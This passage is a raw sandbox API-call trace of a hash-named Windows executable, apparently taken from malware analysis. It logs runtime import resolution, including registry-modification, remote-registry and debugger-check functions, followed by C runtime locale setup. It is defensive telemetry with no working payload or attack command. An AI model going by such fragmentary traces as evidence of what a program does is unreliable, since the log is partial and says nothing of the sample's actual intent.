(HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x571260 [0101.195] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x571298 [0101.195] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x5712c0 [0101.213] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x74580000 [0101.214] GetProcAddress (hModule=0x74580000, lpProcName="CloseHandle") returned 0x745a6630 [0101.214] GetProcAddress (hModule=0x74580000, lpProcName="CreateFileW") returned 0x745a6890 [0101.214] GetProcAddress (hModule=0x74580000, lpProcName="DecodePointer") returned 0x7788d830 [0101.215] GetProcAddress (hModule=0x74580000, lpProcName="DeleteCriticalSection") returned 0x77880e60 [0101.215] GetProcAddress (hModule=0x74580000, lpProcName="DuplicateHandle") returned 0x745a6640 [0101.215] GetProcAddress (hModule=0x74580000, lpProcName="EnterCriticalSection") returned 0x7786f290 [0101.215] GetProcAddress (hModule=0x74580000, lpProcName="ExitProcess") returned 0x745a7b30 [0101.215] GetProcAddress (hModule=0x74580000, lpProcName="FindClose") returned 0x745a68e0 [0101.215] GetProcAddress (hModule=0x74580000, lpProcName="FindFirstFileExW") returned 0x745a6940 [0101.215] GetProcAddress (hModule=0x74580000, lpProcName="FindNextFileW") returned 0x745a69a0 [0101.215] GetProcAddress (hModule=0x74580000, lpProcName="FlushFileBuffers") returned 0x745a69b0 [0101.215] GetProcAddress (hModule=0x74580000, lpProcName="FreeEnvironmentStringsW") returned 0x7459a7e0 [0101.215] GetProcAddress (hModule=0x74580000, lpProcName="FreeLibrary") returned 0x74599f50 [0101.215] GetProcAddress (hModule=0x74580000, lpProcName="GetACP") returned 0x74598500 [0101.216] GetProcAddress (hModule=0x74580000, lpProcName="GetCPInfo") returned 0x7459a290 [0101.216] GetProcAddress (hModule=0x74580000, lpProcName="GetCommandLineA") returned 0x7459ab60 [0101.216] GetProcAddress (hModule=0x74580000, lpProcName="GetCommandLineW") returned 0x7459aba0 [0101.216] GetProcAddress (hModule=0x74580000, lpProcName="GetConsoleMode") returned 0x745a6f70 [0101.216] GetProcAddress (hModule=0x74580000, lpProcName="GetConsoleOutputCP") returned 0x745a6f80 [0101.216] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentProcess") returned 0x745938c0 [0101.216] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentProcessId") returned 0x745923e0 [0101.216] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentProcessorNumber") returned 0x7788a890 [0101.216] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentThreadId") returned 0x74591b90 [0101.216] GetProcAddress (hModule=0x74580000, lpProcName="GetEnvironmentStringsW") returned 0x7459aac0 [0101.216] GetProcAddress (hModule=0x74580000, lpProcName="GetFileType") returned 0x745a6aa0 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="GetLastError") returned 0x74593870 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleFileNameW") returned 0x74599b00 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleHandleExW") returned 0x7459a2b0 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleHandleW") returned 0x74599bc0 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="GetOEMCP") returned 0x745a5140 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="GetProcAddress") returned 0x745978b0 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="GetProcessHeap") returned 0x74597710 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="GetStartupInfoW") returned 0x7459a740 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="GetStdHandle") returned 0x7459a6e0 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="GetStringTypeW") returned 0x74597950 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="GetSystemTimeAsFileTime") returned 0x74597620 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="HeapAlloc") returned 0x77862bd0 [0101.217] GetProcAddress (hModule=0x74580000, lpProcName="HeapFree") returned 0x74591ba0 [0101.218] GetProcAddress (hModule=0x74580000, lpProcName="HeapReAlloc") returned 0x7785efe0 [0101.218] GetProcAddress (hModule=0x74580000, lpProcName="HeapSize") returned 0x7785bb20 [0101.218] GetProcAddress (hModule=0x74580000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x745a6730 [0101.218] GetProcAddress (hModule=0x74580000, lpProcName="InitializeSListHead") returned 0x77895f60 [0101.218] GetProcAddress (hModule=0x74580000, lpProcName="IsDebuggerPresent") returned 0x7459b0b0 [0101.218] GetProcAddress (hModule=0x74580000, lpProcName="IsProcessorFeaturePresent") returned 0x74599bf0 [0101.218] GetProcAddress (hModule=0x74580000, lpProcName="IsValidCodePage") returned 0x7459a790 [0101.218] GetProcAddress (hModule=0x74580000, lpProcName="LCMapStringW") returned 0x74599f30 [0101.218] GetProcAddress (hModule=0x74580000, lpProcName="LeaveCriticalSection") returned 0x7786f210 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryExW") returned 0x74597930 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="MultiByteToWideChar") returned 0x74592ad0 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="QueryPerformanceCounter") returned 0x745938a0 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="RaiseException") returned 0x74598c20 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="RtlUnwind") returned 0x74598c10 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="SetFilePointerEx") returned 0x745a6c50 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="SetLastError") returned 0x74592af0 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="SetPriorityClass") returned 0x74599e90 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="SetStdHandle") returned 0x745c2430 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="SetUnhandledExceptionFilter") returned 0x7459a940 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="TerminateProcess") returned 0x745a5100 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="TlsAlloc") returned 0x7459a120 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="TlsFree") returned 0x7459a040 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="TlsGetValue") returned 0x74591b70 [0101.219] GetProcAddress (hModule=0x74580000, lpProcName="TlsSetValue") returned 0x745929d0 [0101.220] GetProcAddress (hModule=0x74580000, lpProcName="UnhandledExceptionFilter") returned 0x745c2670 [0101.220] GetProcAddress (hModule=0x74580000, lpProcName="WideCharToMultiByte") returned 0x74593880 [0101.220] GetProcAddress (hModule=0x74580000, lpProcName="WriteConsoleW") returned 0x745a7020 [0101.220] GetProcAddress (hModule=0x74580000, lpProcName="WriteFile") returned 0x745a6ca0 [0101.220] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74810000 [0108.993] GetProcAddress (hModule=0x74810000, lpProcName="OpenProcessToken") returned 0x7482f520 [0108.994] GetProcAddress (hModule=0x74810000, lpProcName="RegConnectRegistryA") returned 0x74858dc0 [0108.994] GetProcAddress (hModule=0x74810000, lpProcName="RegConnectRegistryW") returned 0x74833fe0 [0108.994] GetProcAddress (hModule=0x74810000, lpProcName="RegCreateKeyExA") returned 0x7482fa60 [0108.994] GetProcAddress (hModule=0x74810000, lpProcName="RegCreateKeyExW") returned 0x7482fa20 [0108.994] GetProcAddress (hModule=0x74810000, lpProcName="RegDeleteKeyExA") returned 0x74847660 [0108.995] GetProcAddress (hModule=0x74810000, lpProcName="RegDeleteKeyExW") returned 0x74832b00 [0108.995] GetProcAddress (hModule=0x74810000, lpProcName="RegDeleteValueA") returned 0x74831160 [0108.995] GetProcAddress (hModule=0x74810000, lpProcName="RegDeleteValueW") returned 0x74830fb0 [0108.995] GetProcAddress (hModule=0x74810000, lpProcName="RegReplaceKeyA") returned 0x7485a110 [0108.995] GetProcAddress (hModule=0x74810000, lpProcName="RegReplaceKeyW") returned 0x7485a8c0 [0108.995] GetProcAddress (hModule=0x74810000, lpProcName="RegSetValueExW") returned 0x7482f7f0 [0108.995] GetProcAddress (hModule=0x74810000, lpProcName="RegSetValueW") returned 0x7485a6d0 [0108.995] GetProcAddress (hModule=0x74810000, lpProcName="RegUnLoadKeyA") returned 0x74847870 [0108.995] GetProcAddress (hModule=0x74810000, lpProcName="RegUnLoadKeyW") returned 0x74847890 [0108.995] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75640000 [0108.996] GetProcAddress (hModule=0x75640000, lpProcName="CreateDialogParamA") returned 0x7566d280 [0108.996] GetProcAddress (hModule=0x75640000, lpProcName="CreateDialogParamW") returned 0x75669f60 [0108.996] GetProcAddress (hModule=0x75640000, lpProcName="DialogBoxIndirectParamW") returned 0x75669680 [0108.996] GetProcAddress (hModule=0x75640000, lpProcName="DialogBoxParamA") returned 0x756a0600 [0108.996] GetProcAddress (hModule=0x75640000, lpProcName="DialogBoxParamW") returned 0x756a06c0 [0108.996] GetProcAddress (hModule=0x75640000, lpProcName="EndDialog") returned 0x75669e60 [0108.996] GetProcAddress (hModule=0x75640000, lpProcName="GetDialogBaseUnits") returned 0x75662b10 [0108.996] GetProcAddress (hModule=0x75640000, lpProcName="GetDlgCtrlID") returned 0x75662040 [0108.997] GetProcAddress (hModule=0x75640000, lpProcName="GetSystemMetrics") returned 0x75659160 [0108.997] GetProcAddress (hModule=0x75640000, lpProcName="GetTitleBarInfo") returned 0x756791d0 [0108.997] GetProcAddress (hModule=0x75640000, lpProcName="GetWindow") returned 0x7565d570 [0108.997] GetProcAddress (hModule=0x75640000, lpProcName="GetWindowInfo") returned 0x756538e0 [0108.997] GetProcAddress (hModule=0x75640000, lpProcName="MapDialogRect") returned 0x7566b510 [0108.997] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxIndirectA") returned 0x756bff50 [0108.997] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxIndirectW") returned 0x756c0050 [0108.997] GetProcAddress (hModule=0x75640000, lpProcName="SendDlgItemMessageA") returned 0x7566a1e0 [0108.997] GetProcAddress (hModule=0x75640000, lpProcName="SendDlgItemMessageW") returned 0x7566cc00 [0108.997] GetProcAddress (hModule=0x75640000, lpProcName="SetDlgItemInt") returned 0x7566d1a0 [0108.997] GetProcAddress (hModule=0x75640000, lpProcName="SetDlgItemTextA") returned 0x7566cff0 [0109.230] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb08 | out: lpSystemTimeAsFileTime=0x19fb08*(dwLowDateTime=0xec923ec, dwHighDateTime=0x1d86028)) [0109.230] GetCurrentThreadId () returned 0x1200 [0109.230] GetCurrentProcessId () returned 0xb5c [0109.230] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb00 | out: lpPerformanceCount=0x19fb00*=2600694094687) returned 1 [0109.230] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0109.276] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0109.277] GetProcAddress (hModule=0x77420000, lpProcName="InitializeCriticalSectionEx") returned 0x774dd740 [0109.277] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0109.277] GetProcAddress (hModule=0x77420000, lpProcName="FlsAlloc") returned 0x774e4490 [0109.277] GetProcAddress (hModule=0x77420000, lpProcName="FlsSetValue") returned 0x774dd7a0 [0109.325] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0109.325] GetProcAddress (hModule=0x77420000, lpProcName="InitializeCriticalSectionEx") returned 0x774dd740 [0109.325] GetProcessHeap () returned 0x6d0000 [0109.325] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0109.325] GetProcAddress (hModule=0x77420000, lpProcName="FlsAlloc") returned 0x774e4490 [0109.360] GetLastError () returned 0x1e7 [0109.360] GetProcAddress (hModule=0x77420000, lpProcName="FlsGetValue") returned 0x774cf350 [0109.360] GetProcAddress (hModule=0x77420000, lpProcName="FlsSetValue") returned 0x774dd7a0 [0109.360] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x364) returned 0x6e3538 [0109.439] SetLastError (dwErrCode=0x1e7) [0109.439] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xe00) returned 0x6e38a8 [0109.441] GetStartupInfoW (in: lpStartupInfo=0x19fa40 | out: lpStartupInfo=0x19fa40*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0109.441] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0109.441] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0109.441] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0109.441] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe\" " [0109.441] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe\" " [0109.442] GetACP () returned 0x4e4 [0109.442] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x220) returned 0x6e46b0 [0109.442] IsValidCodePage (CodePage=0x4e4) returned 1 [0109.442] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fa60 | out: lpCPInfo=0x19fa60) returned 1 [0109.442] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f328 | out: lpCPInfo=0x19f328) returned 1 [0109.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f93c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0109.463] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f93c, cbMultiByte=256, lpWideCharStr=0x19f0c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0109.463] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x19f33c | out: lpCharType=0x19f33c) returned 1 [0109.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f93c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0109.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f93c, cbMultiByte=256, lpWideCharStr=0x19f078, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0109.470] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0109.470] GetProcAddress (hModule=0x77420000, lpProcName="LCMapStringEx") returned 0x774c95f0 [0109.470] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0109.470] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19ee68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0109.470] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x19f83c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÊÂc\x8axú\x19", lpUsedDefaultChar=0x0) returned 256 [0109.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f93c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0109.471] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f93c, cbMultiByte=256, lpWideCharStr=0x19f098, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0109.471] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0109.471] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x19ee88, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0109.471] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x19f73c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f 